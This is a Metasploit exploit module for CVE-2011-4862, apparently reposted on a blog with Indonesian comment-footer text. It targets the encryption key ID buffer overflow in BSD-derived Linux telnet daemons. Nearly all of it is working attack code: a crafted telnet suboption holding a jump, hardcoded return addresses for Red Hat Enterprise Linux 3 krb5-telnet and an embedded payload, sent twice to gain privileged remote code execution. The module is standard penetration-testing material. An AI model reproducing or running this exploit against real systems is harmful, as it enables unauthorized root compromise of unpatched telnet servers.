##
# $Id: $ |
## |
## |
# This file is part of the Metasploit Framework and may be subject to |
# redistribution and commercial restrictions. Please see the Metasploit |
# Framework web site for more information on licensing and terms of use. |
# http://metasploit.com/framework/ |
## |
require 'msf/core' |
class Metasploit3 < Msf::Exploit::Remote |
Rank = GreatRanking |
|
include Msf::Exploit::Remote::Telnet |
include Msf::Exploit::BruteTargets |
def initialize(info = {}) |
super (update_info(info, |
'Name' => 'Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow' , |
'Description' => %q{ |
This module exploits a buffer overflow in the encryption option handler of the |
Linux BSD -derived telnet service (inetutils or krb5-telnet). Most Linux distributions |
use NetKit-derived telnet daemons, so this flaw only applies to a small subset of |
Linux systems running telnetd. |
}, |
'Author' => [ 'Jaime Penalba Estebanez <jpenalbae[at]gmail.com>' , 'Brandon Perry <bperry.volatile[at]gmail.com>' , 'Dan Rosenberg' , 'hdm' ], |
'License' => MSF_LICENSE , |
'References' => |
[ |
[ 'CVE' , '2011-4862' ], |
[ 'OSVDB' , '78020' ], |
[ 'BID' , '51182' ], |
[ 'URL' , 'http://www.exploit-db.com/exploits/18280/' ] |
], |
'Privileged' => true , |
'Platform' => 'linux' , |
'Payload' => |
{ |
'Space' => 200 , |
'BadChars' => "\x00" , |
'DisableNops' => true , |
}, |
|
'Targets' => |
[ |
[ 'Automatic' , { } ], |
[ 'Red Hat Enterprise Linux 3 (krb5-telnet)' , { 'Ret' => 0x0804b43c } ], |
], |
'DefaultTarget' => 0 , |
'DisclosureDate' => 'Dec 23 2011' )) |
end |
def exploit_target(t) |
connect |
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) |
print_status(banner_sanitized) if datastore[ 'VERBOSE' ] |
enc_init = "\xff\xfa\x26\x00\x01\x01\x12\x13\x14\x15\x16\x17\x18\x19\xff\xf0" |
enc_keyid = "\xff\xfa\x26\x07" |
end_suboption = "\xff\xf0" |
penc = payload.encoded.gsub( "\xff" , "\xff\xff" ) |
|
key_id = Rex::Text.rand_text_alphanumeric( 400 ) |
key_id[ 0 , 2 ] = "\xeb\x76" |
key_id[ 72 , 4 ] = [ t[ 'Ret' ] - 20 ].pack( "V" ) |
key_id[ 76 , 4 ] = [ t[ 'Ret' ] ].pack( "V" ) |
# Some of these bytes can get mangled, jump over them |
key_id[ 80 , 40 ] = "\x41" * 40 |
# Insert the real payload |
key_id[ 120 , penc.length] = penc |
# Create the Key ID command |
sploit = enc_keyid + key_id + end_suboption |
# Initiate encryption |
sock.put(enc_init) |
# Wait for a successful response |
loop do |
data = sock.get_once(- 1 , 5 ) rescue nil |
if not data |
raise RuntimeError, "This system does not support encryption" |
end |
break if data.index( "\xff\xfa\x26\x02\x01" ) |
end |
# The first request smashes the pointer |
print_status( "Sending first payload" ) |
sock.put(sploit) |
|
# Make sure the server replied to the first request |
data = sock.get_once(- 1 , 5 ) |
unless data |
print_status( "Server did not respond to first payload" ) |
return |
end |
# Some delay between each request seems necessary in some cases |
:: IO .select( nil , nil , nil , 0 . 5 ) |
# The second request results in the pointer being called |
print_status( "Sending second payload..." ) |
sock.put(sploit) |
handler |
:: IO .select( nil , nil , nil , 0 . 5 ) |
disconnect |
end |
end
Tidak ada komentar:
Posting Komentar